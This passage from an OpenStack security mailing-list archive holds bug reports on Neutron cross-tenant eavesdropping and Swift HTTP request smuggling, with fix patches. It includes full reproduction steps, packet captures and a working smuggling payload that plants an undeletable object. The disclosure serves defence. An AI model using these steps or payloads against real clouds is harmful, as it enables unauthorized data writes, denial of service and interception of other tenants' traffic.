Conditions ---------- The following conditions are necessary. * Openvswitch Self-service networks * An Openstack administrator or an automated process needs to schedule a Live migration We tested this on newton. Issues ------ This outcome is the result of multiple independent issues. We will list the most important first, and follow with bugs that create a fragile situation. Issue #1 Initially creating a trunk port When the port is initially created, it is in trunk mode. This creates a fail-open situation. See: https://github.com/openstack/os-vif/blob/newton-eol/vif_plug_ovs/linux_net.py#L52 Recommendation: create ports in the port_dead state, don't leave it dangling in trunk-mode. Add a drop-flow initially. Issue #2 Order of creation. The instance is actually migrated before the (networking) configuration is completed. Recommendation: wait with finishing the live migration until the underlying configuration has been applied completely. Issue #3 Not closing the port when it is down. Neutron calls the port_dead function to ensure the port is down. It sets the tag to 4095 and adds a "drop" flow if (and only if) there is already another tag on the port. The port_dead function will keep untagged ports untagged. https://github.com/openstack/neutron/blob/stable/newton/neutron/plugins/ml2/drivers/openvswitch/agent/ovs_neutron_agent.py#L995 Recommendation: Make port_dead also shut the port if no tag is found. Log a warning if this happens. Issue #4 Putting the port administratively down actually puts the port on a compute node shared vlan Instances from different projects on different private networks can talk to each other if they put their ports down. The code does install an openflow "drop" rule but it has a lower priority (2) than the allow rules. Recommendation: Increase the port_dead openflow drop rule priority to MAX Timeline --------  2017-09-14 Discovery eavesdropping issue  2017-09-15 Verify workaround.  2017-10-04 Discovery port-down-traffic issue  2017-11-24 Vendor Disclosure to Openstack Steps to reproduce ------------------ 1. Attach an instance to two networks: admin$ openstack server create --nic net-id= --nic net-id = --image --flavor instance_temp 2. Attach a FIP to the instance to be able to log in to this instance 3. Verify: admin$ openstack server show -c name -c addresses fe28a2ee-098f-4425 -9d3c-8e2cd383547d +-----------+-----------------------------------------------------------------------------+ | Field | Value | +-----------+-----------------------------------------------------------------------------+ | addresses | network1=192.168.99.8, ; network2=192.168.80.14 | | name | instance_temp | +-----------+-----------------------------------------------------------------------------+ 4. Ssh to the instance using network1 and run a tcpdump on the other port network2 [root at instance_temp]$ tcpdump -eeenni eth1 5. 
Get port-id of network2 admin$ nova interface-list fe28a2ee-098f-4425-9d3c-8e2cd383547d +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ | Port State | Port ID | Net ID | IP addresses | MAC Addr | +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ | ACTIVE | a848520b-0814-4030-bb48-49e4b5cf8160 | d69028f7-9558-4f14-8ce6-29cb8f1c19cd | 192.168.80.14 | fa:16:3e:2d:8b:7b | | ACTIVE | fad148ca-cf7a-4839-aac3-a2cd8d1d2260 | d22c22ae-0a42-4e3b-8144-f28534c3439a | 192.168.99.8 | fa:16:3e:60:2c:fa | +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ 6. Force port down on network 2 admin$ neutron port-update a848520b-0814-4030-bb48-49e4b5cf8160 --admin-state-up False 7. Port gets tagged with vlan 4095, the dead vlan tag, which is normal: compute1# grep a848520b-0814-4030-bb48-49e4b5cf8160 /var/log/neutron/neutron-openvswitch-agent.log | tail -1 INFO neutron.plugins.ml2.drivers.openvswitch.agent.ovs_neutron_agent [req-e008feb3-8a35-4c97-adac-b48ff88165b2 - - - - -] VIF port: a848520b-0814-4030-bb48-49e4b5cf8160 admin state up disabled, putting on the dead VLAN 8. Verify the port is tagged with vlan 4095 compute1# ovs-vsctl show | grep -A3 qvoa848520b-08       Port "qvoa848520b-08"           tag: 4095           Interface "qvoa848520b-08" 9. Now live-migrate the instance: admin# nova live-migration fe28a2ee-098f-4425-9d3c-8e2cd383547d 10. Verify the tag is gone on compute2, and take a deep breath compute2# ovs-vsctl show | grep -A3 qvoa848520b-08       Port "qvoa848520b-08"           Interface "qvoa848520b-08"       Port... compute2# echo "Wut!" 11. 
Now traffic of all other self-service networks present on compute2 can be sniffed from instance_temp [root at instance_temp] tcpdump -eenni eth1 13:14:31.748266 fa:16:3e:6a:17:38 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.152, length 28 13:14:31.804573 fa:16:3e:e8:a2:d2 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.70, length 28 13:14:31.810482 fa:16:3e:95:ca:3a > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.154, length 28 13:14:31.977820 fa:16:3e:6f:f4:9b > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.150, length 28 13:14:31.979590 fa:16:3e:0f:3d:cc > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 9, p 0, ethertype ARP, Request who-has 10.103.9.163 tell 10.103.9.1, length 28 13:14:32.048082 fa:16:3e:65:64:38 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.101, length 28 13:14:32.127400 fa:16:3e:30:cb:b5 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.165, length 28 13:14:32.141982 fa:16:3e:96:cd:b0 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.100, length 28 13:14:32.205327 fa:16:3e:a2:0b:76 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.153, length 28 13:14:32.444142 fa:16:3e:1f:db:ed > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 58: vlan 72, p 0, ethertype IPv4, 192.168.99.212 > 224.0.0.18: VRRPv2, Advertisement, vrid 50, prio 103, authtype none, intvl 1s, length 20 13:14:32.449497 fa:16:3e:1c:24:c0 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.20, length 28 13:14:32.476015 fa:16:3e:f2:3b:97 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.22, length 28 13:14:32.575034 fa:16:3e:44:fe:35 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.163, length 28 13:14:32.676185 fa:16:3e:1e:92:d7 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.150, length 28 13:14:32.711755 fa:16:3e:99:6c:c8 > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 62: vlan 10, p 0, ethertype IPv4, 10.103.12.154 > 224.0.0.18: VRRPv2, Advertisement, vrid 2, prio 49, authtype simple, intvl 1s, length 24 13:14:32.711773 fa:16:3e:f5:23:d5 > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 58: vlan 12, p 0, ethertype IPv4, 10.103.15.154 > 224.0.0.18: VRRPv2, Advertisement, vrid 1, prio 49, authtype simple, intvl 1s, length 20 Workaround ---------- We temporary fixed this issue by forcing the dead vlan tag on port creation on compute nodes: /usr/lib/python2.7/site-packages/vif_plug_ovs/linux_net.py: def _create_ovs_vif_cmd(bridge, dev, iface_id, mac,                         instance_id, interface_type=None,                         vhost_server_path=None): + # ODCN: initialize port as dead + # ODCN: TODO: set drop flow     cmd = ['--', '--if-exists', 
'del-port', dev, '--',             'add-port', bridge, dev, + 'tag=4095',             '--', 'set', 'Interface', dev,             'external-ids:iface-id=%s' % iface_id,             'external-ids:iface-status=active',             'external-ids:attached-mac=%s' % mac,             'external-ids:vm-uuid=%s' % instance_id]     if interface_type:         cmd += ['type=%s' % interface_type]     if vhost_server_path:         cmd += ['options:vhost-server-path=%s' % vhost_server_path]     return cmd https://github.com/openstack/neutron/blob/stable/newton/neutron/plugins/ml2/drivers/openvswitch/agent/ovs_neutron_agent.py#L995     def port_dead(self, port, log_errors=True):         '''Once a port has no binding, put it on the "dead vlan".         :param port: an ovs_lib.VifPort object.         '''         # Don't kill a port if it's already dead         cur_tag = self.int_br.db_get_val("Port", port.port_name, "tag",                                          log_errors=log_errors) + # ODCN GM 20170915 + if not cur_tag: + LOG.error('port_dead(): port %s has no tag', port.port_name) + # ODCN AJS 20170915 + if not cur_tag or cur_tag != constants.DEAD_VLAN_TAG: - if cur_tag and cur_tag != constants.DEAD_VLAN_TAG:            LOG.info('port_dead(): put port %s on dead vlan', port.port_name)            self.int_br.set_db_attribute("Port", port.port_name, "tag",                                          constants.DEAD_VLAN_TAG,                                          log_errors=log_errors)             self.int_br.drop_port(in_port=port.ofport) plugins/ml2/drivers/openvswitch/agent/openflow/ovs_ofctl/ovs_bridge.py     def drop_port(self, in_port): + # ODCN AJS 20171004: - self.install_drop(priority=2, in_port=in_port) + self.install_drop(priority=65535, in_port=in_port) Regards, ODC Noord. Gerhard Muntingh Albert Siersema Paul Peereboom To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1734320/+subscriptions From 1840507 at bugs.launchpad.net Thu Oct 3 16:34:40 2019 From: 1840507 at bugs.launchpad.net (OpenStack Infra) Date: Thu, 03 Oct 2019 16:34:40 -0000 Subject: [Openstack-security] [Bug 1840507] Fix included in openstack/swift 2.23.0 References: <156599088351.26410.7391620144910796824.malonedeb@gac.canonical.com> Message-ID: <157012048028.21544.8801188511879418908.malone@chaenomeles.canonical.com> This issue was fixed in the openstack/swift 2.23.0 release. -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1840507 Title: Mixed py2/py3 environment allows authed users to write arbitrary data to the cluster Status in OpenStack Security Advisory: Won't Fix Status in OpenStack Object Storage (swift): Fix Released Bug description: Python 3 doesn't parse headers the same way as python 2 [1]. We attempt to address this failing [2], but since we're doing it at the application level, eventlet can still get confused about what should and should not be the request body. 
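The other half of the fix that landed on master (quoted earlier in this thread) re-aligns eventlet's already-constructed wsgi.input with the complete header set once the application has re-parsed the headers that the Python 3 stdlib dropped. A rough sketch of the idea; chunked_input and content_length are attributes of eventlet's wsgi.Input, but this is illustrative rather than the exact Swift change:

    def refresh_input_framing(environ):
        # Make the framing eventlet will use when reading the body agree
        # with the headers the application actually sees.
        wsgi_input = environ['wsgi.input']
        te = environ.get('HTTP_TRANSFER_ENCODING', '')
        if 'chunked' in te.lower():
            # Chunked framing wins; any Content-Length is ignored.
            wsgi_input.chunked_input = True
            wsgi_input.content_length = None
        elif environ.get('CONTENT_LENGTH'):
            wsgi_input.content_length = int(environ['CONTENT_LENGTH'])

    class _FakeInput(object):
        # Stand-in for eventlet.wsgi.Input, for this sketch only.
        chunked_input = False
        content_length = 4

    env = {'wsgi.input': _FakeInput(), 'HTTP_TRANSFER_ENCODING': 'chunked',
           'CONTENT_LENGTH': '4'}
    refresh_input_framing(env)
    assert env['wsgi.input'].chunked_input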
Consider a client request like   PUT /v1/AUTH_test/c/o HTTP/1.1   Host: saio:8080   Content-Length: 4   Connection: close   X-Object-Meta-x-🌴: 👍   X-Auth-Token: AUTH_tk71fece73d6af458a847f82ef9623d46a   Transfer-Encoding: chunked   aa   PUT /sdb1/0/DUDE_u/r/pwned HTTP/1.1   Content-Length: 4   X-Timestamp: 9999999999.99999_ffffffffffffffff   Content-Type: text/evil   X-Backend-Storage-Policy-Index: 1   evil   0 A python 2 proxy-server will auth the user, add a bunch more headers, and send a request on to the object-servers like   PUT /sdb1/312/AUTH_test/c/o HTTP/1.1   Accept-Encoding: identity   Expect: 100-continue   X-Container-Device: sdb2   Content-Length: 4   X-Object-Meta-X-🌴: 👍   Connection: close   X-Auth-Token: AUTH_tk71fece73d6af458a847f82ef9623d46a   Content-Type: application/octet-stream   X-Backend-Storage-Policy-Index: 1   X-Timestamp: 1565985475.83685   X-Container-Host: 127.0.0.1:6021   X-Container-Partition: 61   Host: saio:8080   User-Agent: proxy-server 3752   Referer: PUT http://saio:8080/v1/AUTH_test/c/o   Transfer-Encoding: chunked   X-Trans-Id: txef407697a8c1416c9cf2d-005d570ac3   X-Backend-Clean-Expiring-Object-Queue: f (Note that the exact order of the headers will vary but is significant; the above was obtained on my machine with PYTHONHASHSEED=1.) On a python 3 object-server, eventlet will only have seen the headers up to (and not including, though that doesn't really matter) the palm tree. Significantly, it sees `Content-Length: 4` (which, per the spec [3], the proxy-server ignored) and doesn't see either of `Connection: close` or `Transfer-Encoding: chunked`. The *application* gets all of the headers, though, so it responds   HTTP/1.1 100 Continue and the proxy sends the body:   aa   PUT /sdb1/0/DUDE_u/r/pwned HTTP/1.1   Content-Length: 4   X-Timestamp: 9999999999.99999_ffffffffffffffff   Content-Type: text/evil   X-Backend-Storage-Policy-Index: 1   evil   0 Since eventlet thinks the request body is only four bytes, swift writes down b'aa\r\n' for AUTH_test/c/o. Since eventlet didn't see the `Connection: close` header, it looks for and processes more requests on the socket, and swift writes a second object:   $ swift-object-info /srv/node1/sdb1/objects-1/0/*/*/9999999999.99999_ffffffffffffffff.data   Path: /DUDE_u/r/pwned     Account: DUDE_u     Container: r     Object: pwned     Object hash: b05097e51f8700a3f5a29d93eb2941f2   Content-Type: text/evil   Timestamp: 2286-11-20T17:46:39.999990 (9999999999.99999_ffffffffffffffff)   System Metadata:     No metadata found   Transient System Metadata:     No metadata found   User Metadata:     No metadata found   Other Metadata:     No metadata found   ETag: 4034a346ccee15292d823416f7510a2f (valid)   Content-Length: 4 (valid)   Partition 705   Hash b05097e51f8700a3f5a29d93eb2941f2   ... There are a few things worth noting at this point: 1. This was for a replicated policy with encryption not enabled.    Having encryption enabled would mitigate this as the attack    payload would be encrypted; using an erasure-coded policy would    complicate the attack, but I believe most EC schemes would still    be vulnerable. 2. An attacker would need to know (or be able to guess) a device    name (such as "sdb1" above) used by one of the backend nodes. 3. Swift doesn't know how to delete this data -- the X-Timestamp    used was the maximum valid value, so no tombstone can be    written over it [4]. 4. The account and container may not actually exist; it doesn't    really matter as no container update is sent. 
As a result, the data written cannot easily be found or tracked. 5. A small payload was used for the demonstration, but it should be fairly trivial to craft a larger one; this has potential as a DoS attack on a cluster by filling its disks. The fix should involve at least two things: First, after re-parsing headers, servers should make appropriate adjustments to environ['wsgi.input'] to ensure that it has all relevant information about the request body. Second, the proxy should not include a Content-Length header when sending a chunk-encoded request to the backend. [1] https://bugs.python.org/issue37093 [2] https://github.com/openstack/swift/commit/76fde8926 [3] https://tools.ietf.org/html/rfc7230#section-3.3.3 item 3 [4] https://github.com/openstack/swift/commit/f581fccf7 To manage notifications about this bug go to: https://bugs.launchpad.net/ossa/+bug/1840507/+subscriptions From 1734320 at bugs.launchpad.net Fri Oct 4 15:39:54 2019 From: 1734320 at bugs.launchpad.net (OpenStack Infra) Date: Fri, 04 Oct 2019 15:39:54 -0000 Subject: [Openstack-security] [Bug 1734320] Re: Eavesdropping private traffic References: <151152217834.14483.1577991310209811902.malonedeb@soybean.canonical.com> Message-ID: <157020359515.16003.145843992420879501.malone@soybean.canonical.com> Reviewed: https://review.opendev.org/686345 Committed: https://git.openstack.org/cgit/openstack/neutron/commit/?id=ffee956d44da34e38e62f82a3bc676cdd6179f48 Submitter: Zuul Branch: stable/rocky commit ffee956d44da34e38e62f82a3bc676cdd6179f48 Author: Sean Mooney Date: Thu Nov 8 16:07:55 2018 +0000 raise priority of dead vlan drop - This change adds a max priority flow to drop all traffic that is associated with the DEAD VLAN 4095. - This change is part of a partial mitigation of bug 1734320. Without this change vlan 4095 traffic will be dropped via a low priority flow after being processed by part/all of the openflow pipeline. By raising the priority and dropping in table 0 we drop invalid packets as soon as they enter the pipeline. Change-Id: I3482c7c4f00942828cc9396cd2f3d646c9e8c9d1 Partial-Bug: #1734320 (cherry picked from commit e3dc447b908f57e9acc0378111b8e09cbd88ddc5) ** Tags added: in-stable-rocky -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1734320 Title: Eavesdropping private traffic Status in neutron: Fix Committed Status in OpenStack Compute (nova): In Progress Status in os-vif: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: Eavesdropping private traffic ============================= Abstract -------- We've discovered a security issue that allows end users within their own private network to receive from, and send traffic to, other private networks on the same compute node. Description ----------- During live-migration there is a small time window where the ports of instances are untagged. Instances have a port trunked to the integration bridge and receive 802.1Q tagged private traffic from other tenants. If the port is administratively down during live migration, the port will remain in trunk mode indefinitely. Traffic is possible between ports that are administratively down, even between tenants' self-service networks. Conditions ---------- The following conditions are necessary. * Openvswitch Self-service networks * An Openstack administrator or an automated process needs to schedule a Live migration We tested this on newton.
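The stable/rocky commit quoted above is the partial mitigation for Issue #4 described below: traffic tagged with the dead VLAN is dropped by a maximum-priority rule in table 0, before any allow rules can match. A hedged sketch of what that rule amounts to, written against an add_flow-style bridge API like the one used elsewhere in this report (names are illustrative, not the exact patch):

    DEAD_VLAN_TAG = 4095
    MAX_PRIORITY = 65535

    def install_dead_vlan_drop(int_br):
        # Drop anything carrying the dead VLAN as soon as it enters the
        # pipeline, instead of relying on a low-priority rule later on.
        int_br.add_flow(table=0,
                        priority=MAX_PRIORITY,
                        dl_vlan=DEAD_VLAN_TAG,
                        actions='drop')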
Issues ------ This outcome is the result of multiple independent issues. We will list the most important first, and follow with bugs that create a fragile situation. Issue #1 Initially creating a trunk port When the port is initially created, it is in trunk mode. This creates a fail-open situation. See: https://github.com/openstack/os-vif/blob/newton-eol/vif_plug_ovs/linux_net.py#L52 Recommendation: create ports in the port_dead state, don't leave it dangling in trunk-mode. Add a drop-flow initially. Issue #2 Order of creation. The instance is actually migrated before the (networking) configuration is completed. Recommendation: wait with finishing the live migration until the underlying configuration has been applied completely. Issue #3 Not closing the port when it is down. Neutron calls the port_dead function to ensure the port is down. It sets the tag to 4095 and adds a "drop" flow if (and only if) there is already another tag on the port. The port_dead function will keep untagged ports untagged. https://github.com/openstack/neutron/blob/stable/newton/neutron/plugins/ml2/drivers/openvswitch/agent/ovs_neutron_agent.py#L995 Recommendation: Make port_dead also shut the port if no tag is found. Log a warning if this happens. Issue #4 Putting the port administratively down actually puts the port on a compute node shared vlan Instances from different projects on different private networks can talk to each other if they put their ports down. The code does install an openflow "drop" rule but it has a lower priority (2) than the allow rules. Recommendation: Increase the port_dead openflow drop rule priority to MAX Timeline --------  2017-09-14 Discovery eavesdropping issue  2017-09-15 Verify workaround.  2017-10-04 Discovery port-down-traffic issue  2017-11-24 Vendor Disclosure to Openstack Steps to reproduce ------------------ 1. Attach an instance to two networks: admin$ openstack server create --nic net-id= --nic net-id = --image --flavor instance_temp 2. Attach a FIP to the instance to be able to log in to this instance 3. Verify: admin$ openstack server show -c name -c addresses fe28a2ee-098f-4425 -9d3c-8e2cd383547d +-----------+-----------------------------------------------------------------------------+ | Field | Value | +-----------+-----------------------------------------------------------------------------+ | addresses | network1=192.168.99.8, ; network2=192.168.80.14 | | name | instance_temp | +-----------+-----------------------------------------------------------------------------+ 4. Ssh to the instance using network1 and run a tcpdump on the other port network2 [root at instance_temp]$ tcpdump -eeenni eth1 5. Get port-id of network2 admin$ nova interface-list fe28a2ee-098f-4425-9d3c-8e2cd383547d +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ | Port State | Port ID | Net ID | IP addresses | MAC Addr | +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ | ACTIVE | a848520b-0814-4030-bb48-49e4b5cf8160 | d69028f7-9558-4f14-8ce6-29cb8f1c19cd | 192.168.80.14 | fa:16:3e:2d:8b:7b | | ACTIVE | fad148ca-cf7a-4839-aac3-a2cd8d1d2260 | d22c22ae-0a42-4e3b-8144-f28534c3439a | 192.168.99.8 | fa:16:3e:60:2c:fa | +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ 6. 
Force port down on network 2 admin$ neutron port-update a848520b-0814-4030-bb48-49e4b5cf8160 --admin-state-up False 7. Port gets tagged with vlan 4095, the dead vlan tag, which is normal: compute1# grep a848520b-0814-4030-bb48-49e4b5cf8160 /var/log/neutron/neutron-openvswitch-agent.log | tail -1 INFO neutron.plugins.ml2.drivers.openvswitch.agent.ovs_neutron_agent [req-e008feb3-8a35-4c97-adac-b48ff88165b2 - - - - -] VIF port: a848520b-0814-4030-bb48-49e4b5cf8160 admin state up disabled, putting on the dead VLAN 8. Verify the port is tagged with vlan 4095 compute1# ovs-vsctl show | grep -A3 qvoa848520b-08       Port "qvoa848520b-08"           tag: 4095           Interface "qvoa848520b-08" 9. Now live-migrate the instance: admin# nova live-migration fe28a2ee-098f-4425-9d3c-8e2cd383547d 10. Verify the tag is gone on compute2, and take a deep breath compute2# ovs-vsctl show | grep -A3 qvoa848520b-08       Port "qvoa848520b-08"           Interface "qvoa848520b-08"       Port... compute2# echo "Wut!" 11. Now traffic of all other self-service networks present on compute2 can be sniffed from instance_temp [root at instance_temp] tcpdump -eenni eth1 13:14:31.748266 fa:16:3e:6a:17:38 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.152, length 28 13:14:31.804573 fa:16:3e:e8:a2:d2 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.70, length 28 13:14:31.810482 fa:16:3e:95:ca:3a > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.154, length 28 13:14:31.977820 fa:16:3e:6f:f4:9b > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.150, length 28 13:14:31.979590 fa:16:3e:0f:3d:cc > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 9, p 0, ethertype ARP, Request who-has 10.103.9.163 tell 10.103.9.1, length 28 13:14:32.048082 fa:16:3e:65:64:38 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.101, length 28 13:14:32.127400 fa:16:3e:30:cb:b5 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.165, length 28 13:14:32.141982 fa:16:3e:96:cd:b0 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.100, length 28 13:14:32.205327 fa:16:3e:a2:0b:76 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.153, length 28 13:14:32.444142 fa:16:3e:1f:db:ed > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 58: vlan 72, p 0, ethertype IPv4, 192.168.99.212 > 224.0.0.18: VRRPv2, Advertisement, vrid 50, prio 103, authtype none, intvl 1s, length 20 13:14:32.449497 fa:16:3e:1c:24:c0 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.20, length 28 13:14:32.476015 fa:16:3e:f2:3b:97 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.22, length 28 13:14:32.575034 fa:16:3e:44:fe:35 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.163, length 28 13:14:32.676185 fa:16:3e:1e:92:d7 > ff:ff:ff:ff:ff:ff, 
Workaround
----------

We temporarily fixed this issue by forcing the dead vlan tag on port creation on the compute nodes:

/usr/lib/python2.7/site-packages/vif_plug_ovs/linux_net.py:

 def _create_ovs_vif_cmd(bridge, dev, iface_id, mac,
                         instance_id, interface_type=None,
                         vhost_server_path=None):
+    # ODCN: initialize port as dead
+    # ODCN: TODO: set drop flow
     cmd = ['--', '--if-exists', 'del-port', dev, '--',
            'add-port', bridge, dev,
+           'tag=4095',
            '--', 'set', 'Interface', dev,
            'external-ids:iface-id=%s' % iface_id,
            'external-ids:iface-status=active',
            'external-ids:attached-mac=%s' % mac,
            'external-ids:vm-uuid=%s' % instance_id]
     if interface_type:
         cmd += ['type=%s' % interface_type]
     if vhost_server_path:
         cmd += ['options:vhost-server-path=%s' % vhost_server_path]
     return cmd

https://github.com/openstack/neutron/blob/stable/newton/neutron/plugins/ml2/drivers/openvswitch/agent/ovs_neutron_agent.py#L995

     def port_dead(self, port, log_errors=True):
         '''Once a port has no binding, put it on the "dead vlan".

         :param port: an ovs_lib.VifPort object.
         '''
         # Don't kill a port if it's already dead
         cur_tag = self.int_br.db_get_val("Port", port.port_name, "tag",
                                          log_errors=log_errors)
+        # ODCN GM 20170915
+        if not cur_tag:
+            LOG.error('port_dead(): port %s has no tag', port.port_name)
+        # ODCN AJS 20170915
+        if not cur_tag or cur_tag != constants.DEAD_VLAN_TAG:
-        if cur_tag and cur_tag != constants.DEAD_VLAN_TAG:
             LOG.info('port_dead(): put port %s on dead vlan', port.port_name)
             self.int_br.set_db_attribute("Port", port.port_name, "tag",
                                          constants.DEAD_VLAN_TAG,
                                          log_errors=log_errors)
             self.int_br.drop_port(in_port=port.ofport)

plugins/ml2/drivers/openvswitch/agent/openflow/ovs_ofctl/ovs_bridge.py

     def drop_port(self, in_port):
+        # ODCN AJS 20171004:
-        self.install_drop(priority=2, in_port=in_port)
+        self.install_drop(priority=65535, in_port=in_port)

Regards,
ODC Noord.
Gerhard Muntingh
Albert Siersema
Paul Peereboom

To manage notifications about this bug go to:
https://bugs.launchpad.net/neutron/+bug/1734320/+subscriptions

From fungi at yuggoth.org Fri Oct 4 20:03:40 2019
From: fungi at yuggoth.org (Jeremy Stanley)
Date: Fri, 04 Oct 2019 20:03:40 -0000
Subject: [Openstack-security] [Bug 1846817] Re: v3/role_assignments filtering exposes unnecessary role assignments
References: <157021550823.969.5501239713217750813.malonedeb@chaenomeles.canonical.com>
Message-ID: <157021942244.15801.2279434195649641679.launchpad@soybean.canonical.com>

** Changed in: ossa
       Status: Incomplete => Won't Fix

** Description changed:

- This issue is being treated as a potential security risk under embargo.
- Please do not make any public mention of embargoed (private) security
- vulnerabilities before their coordinated publication by the OpenStack
- Vulnerability Management Team in the form of an official OpenStack
- Security Advisory. This includes discussion of the bug or associated
- fixes in public forums such as mailing lists, code review systems and
- bug trackers. Please also avoid private disclosure to other individuals
- not already approved for access to this information, and provide this
- same reminder to those who are made aware of the issue prior to
- publication. All discussion should remain confined to this private bug
- report, and any proposed fixes should be added to the bug as
- attachments.
-
  I have a deployment that exercises multiple system role assignments:
   - An "operator" user has the "admin" role on the system
   - A "system-support" user has the "member" role on the system
   - A "system-admins" group has the "reader" role on the system

  If I ask keystone to filter a list of role assignments by --system all
  and --role member, I should only see a list with the "system-support"
  user and the "operator" user. Instead, I get a list with three entries
  that includes the group, which doesn't have the member role at all, it
  only has reader. Depending on how you classify this, it could leak
  information to clients. Groups don't appear to be filtered from the
  list since "reader" doesn't imply "member" (it's the other way around).

$ openstack role assignment list --names --system all --debug
START with options: role assignment list --names --system all --debug
options: Namespace(access_key='', access_secret='***', access_token='***', access_token_endpoint='', access_token_type='', application_credential_id='', application_credential_name='', application_credential_secret='***', auth_methods='', auth_type='', auth_url='', cacert=None, cert='', client_id='', client_secret='***', cloud='devstack-system-admin', code='', consumer_key='', consumer_secret='***', debug=True, default_domain='default', default_domain_id='', default_domain_name='', deferred_help=False, discovery_endpoint='', domain_id='', domain_name='', endpoint='', identity_provider='', identity_provider_url='', insecure=None, interface='public', key='', log_file=None, openid_scope='', os_beta_command=False, os_compute_api_version='', os_identity_api_version='', os_image_api_version='', os_key_manager_api_version='1', os_network_api_version='', os_object_api_version='', os_project_id=None, os_project_name=None, os_volume_api_version='', passcode='', password='***', profile='', project_domain_id='', project_domain_name='', project_id='', project_name='', protocol='', redirect_uri='', region_name='', remote_project_domain_id='', remote_project_domain_name='', remote_project_id='', remote_project_name='', service_provider='', service_provider_endpoint='', service_provider_entity_id='', system_scope='', timing=False, token='***', trust_id='', url='', user_domain_id='', user_domain_name='', user_id='', username='', verbose_level=3, verify=None)
Auth plugin password selected
auth_config_hook(): {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'cacert': None, u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-admin', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username':
